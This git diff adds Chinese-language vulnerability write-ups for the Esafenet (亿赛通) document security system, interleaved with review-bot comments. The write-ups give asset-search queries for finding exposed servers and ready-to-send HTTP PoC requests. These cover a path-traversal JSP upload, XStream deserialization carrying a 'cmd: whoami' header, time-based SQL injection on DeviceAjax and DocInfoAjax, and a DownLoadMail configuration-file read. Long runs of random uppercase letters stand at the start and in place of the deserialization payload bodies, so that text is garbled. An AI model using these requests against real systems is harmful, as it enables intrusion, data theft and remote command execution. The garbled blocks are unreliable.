BOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIG
+``` + +![1706605111262-da8c35eb-506a-4bef-8235-540ebe84fef0.png](./img/IibT0D1-9oe0dU9a/1706605111262-da8c35eb-506a-4bef-8235-540ebe84fef0-498107.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/laxakypzti0idoei> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统DecryptApplicationService2接口任意文件上传.md b/亿赛通电子文档安全管理系统DecryptApplicationService2接口任意文件上传.md new file mode 100644 index 0000000..d5b968f
--- /dev/null +++ b/亿赛通电子文档安全管理系统DecryptApplicationService2接口任意文件上传.md @@ -0,0 +1,40 @@ +# 亿赛通 电子文档安全管理系统 DecryptApplicationService2接口任意文件上传 + +# 一、漏洞简介 +亿赛通电子文档安全管理系统是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/3DzwHgk0XXbWaCGw/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-368700.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/pentest.jsp HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Host: IP:PORT +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: JSESSIONID=B9964151074C71F115A9C803FFF05C34 +Upgrade-Insecure-Requests: 1 +Content-Length: 11 + +pentest +``` + + + +<font style="color:rgb(51, 51, 51);">文件地址:/CDGServer3/pentest.jsp</font> + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gbd5spifnesrczm0> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统DecryptionApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统DecryptionApp存在xstream反序列化漏洞.md new file mode 100644 index 0000000..29120e1 --- /dev/null +++ b/亿赛通电子文档安全管理系统DecryptionApp存在xstream反序列化漏洞.md 
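Review bot: the closing sentence of the 漏洞简介 paragraph, "亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载。", describes a different issue (ClientAjax arbitrary file download) and contradicts the title and the rest of this file, which document an arbitrary file upload through DecryptApplicationService2; replace it with a one-line statement of this issue, namely that the `fileId` query parameter is used as a file path without rejecting `../` segments, so the request body is written to a caller-chosen location under the webapp (the `文件地址:/CDGServer3/pentest.jsp` line is the resulting file). The request in the 漏洞复现 block also carries two `User-Agent` and two `Accept` headers, which is a proxy-capture leftover, and `Content-Length: 11` does not match the 7-byte body `pentest`; tidy it so the request is replayable as written. 影响版本 lists only the product name: state the affected and fixed builds or say they are unknown, and add what defenders can check (unexpected `.jsp` files under `/CDGServer3/` and requests to `DecryptApplicationService2` whose `fileId` contains `..`).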
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统DecryptionApp存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统DecryptionApp存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/T6HTQQEzJebP8SXq/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-568771.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/DecryptionApp HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 +
+``` + +![1706607036432-dff26af7-9068-4d30-a353-9fe1bedeae71.png](./img/T6HTQQEzJebP8SXq/1706607036432-dff26af7-9068-4d30-a353-9fe1bedeae71-784248.png) + + + +> 更新: 2024-04-20 22:01:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cewauxybrlo14kzk> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞.md new file mode 100644 index 0000000..7af1465 --- /dev/null +++ b/亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞.md
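Review bot: the 漏洞复现 request declares `Content-Type: text/xml` and `Content-Length: 14756`, but the write-up never says what the roughly 14 KB body is, how it was produced, or which XStream-deserialised class it targets, and the role of the `cmd: whoami` header is not explained anywhere in the text; a reader cannot verify the finding or write a detection from this. Replace the opaque body with a description of the gadget chain or a pointer to the tool that generates it, and explain the `cmd` header. 影响版本 names only the product; give the affected product and XStream versions and the fix (upgrade, or an XStream type allowlist on the `/CDGServer3/DecryptionApp` handler). The 资产测绘 block (hunter `app.name="ESAFENET 亿赛通文档安全管理系统"` plus the same login-page screenshot) is repeated verbatim from the sibling 亿赛通 files; consider linking to one copy.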
@@ -0,0 +1,21 @@ +# 亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞 + +亿某通电子文档安全管理系统` DeviceAjax`接口的`SecureUsbid`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa + +```yaml +app="亿赛通-DLP" +``` + +## poc + +```javascript +POST /CDGServer3/js/../DeviceAjax HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +command=delSecureUsb&SecureUsbid=-1'waitfor delay '0:0:5'-- +``` + diff --git a/亿赛通电子文档安全管理系统DocInfoAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统DocInfoAjax存在SQL注入漏洞.md new file mode 100644 index 0000000..8b76651 --- /dev/null +++ b/亿赛通电子文档安全管理系统DocInfoAjax存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +# 亿赛通电子文档安全管理系统DocInfoAjax存在SQL注入漏洞 + +亿某通电子文档安全管理系统` DocInfoAjax`接口的`logicpath`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa + +```yaml +app="亿赛通-DLP" +``` + +## poc + +```javascript +POST /CDGServer3/js/../DocInfoAjax HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +command=JudgeHasFile&logicpath==-1'waitfor delay '0:0:5'-- +``` + +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501122249109.png) diff --git a/亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞.md b/亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞.md new file mode 100644 index 0000000..f3660a2 --- /dev/null +++ b/亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞.md 
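Review bot: in the DeviceAjax hunk, the poc fence is tagged ```javascript although it holds a raw HTTP request, and the fofa fence is tagged ```yaml for a single query string; retag them (```http or ```plain, and ```text) so highlighting does not mislead. The request path `/CDGServer3/js/../DeviceAjax` contains a `js/..` segment whose purpose is not stated; if it is what makes the endpoint reachable without a session, say so, because that is both the detection point (search access logs for `/js/../`) and part of the fix (normalise the path before any authentication filter). The root cause is given as missing 预编译 on `SecureUsbid`, so state the fix as a prepared statement for that query. The body calls the product 亿某通 while the title says 亿赛通; make them consistent, and add 影响版本 and a fixed version or a note that they are unknown.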
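Review bot: in the DocInfoAjax hunk, the poc body `command=JudgeHasFile&logicpath==-1'waitfor delay '0:0:5'--` has a doubled `=` after `logicpath`; if the extra character is deliberate, say why, otherwise drop it, since as written it differs from the DeviceAjax request in a way the text does not explain. The same fence-tag problem as DeviceAjax applies (```javascript for an HTTP request, ```yaml for a fofa query), the product is again called 亿某通 in the body but 亿赛通 in the title, and no affected or fixed versions are given; the fix (a prepared statement for the `logicpath` lookup) should be stated. The screenshot points at an external COS bucket (`sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com`) rather than `./img` like every other file in this commit; check the image in so the document does not rot.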
@@ -0,0 +1,46 @@ +# 亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞 + +# 一、漏洞简介 +亿赛通电子文档安全管理系统是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/qzeKmVZUxpzWRkIb/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-916900.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/esafenet/DownLoadMail HTTP/1.1 +Host: {hostname} +Cookie: JSESSIONID=F0F476C5479EB3F01A61D1C7DF8ECB3F; JSESSIONID=0F2F97A8E40DE2E33C5922685B1BACEC +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 42 + +path=/WEB-INF/classes/&name=common.cfg.xml +``` + +![1703415481453-1b65cdf4-c6b9-46de-8457-e35141f47277.png](./img/qzeKmVZUxpzWRkIb/1703415481453-1b65cdf4-c6b9-46de-8457-e35141f47277-481265.png) + +nuclei脚本 + +[亿赛通电子文档安全管理系统-downloadmail-文件读取.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713621691094-966b96fe-5f06-4dd5-b160-becec33698b9.yaml) + + + +> 更新: 2024-04-20 22:01:30 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wdt0bxk0o0adw6zu> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统EmailAuditService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统EmailAuditService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..8b1ca9d --- /dev/null 
+++ b/亿赛通电子文档安全管理系统EmailAuditService存在xstream反序列化漏洞.md 
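Review bot: the DownLoadMail request's `Cookie` header carries two session ids (`JSESSIONID=F0F476C5479EB3F01A61D1C7DF8ECB3F; JSESSIONID=0F2F97A8E40DE2E33C5922685B1BACEC`), a capture leftover; keep one, or drop the header entirely if the endpoint needs no session, and say which, because whether this file read is pre-auth decides its severity. The body `path=/WEB-INF/classes/&name=common.cfg.xml` implies `path` and `name` are joined into a filesystem path with no check that the result stays inside the intended directory; state that as the root cause and give the fix (canonicalise the path and reject anything outside the mail directory), and note that `common.cfg.xml` under `WEB-INF/classes` is a configuration file, which is why this is worth more than a generic file-read rating. The "nuclei脚本" is only a link to a yuque attachment, not a file in this commit; add the YAML to the repository so it is versioned with this document. 影响版本 lists only the product name.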
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统EmailAuditService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统EmailAuditService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/8zi-BeBfAYPgtdrb/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-119926.png) + +# 四、漏洞复现 +```java +POST /CDGServer3/EmailAuditService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: {hostname} +cmd: whoami +Content-Length: 14756 +
HIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKG
JKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBP
JLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICK
NMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBD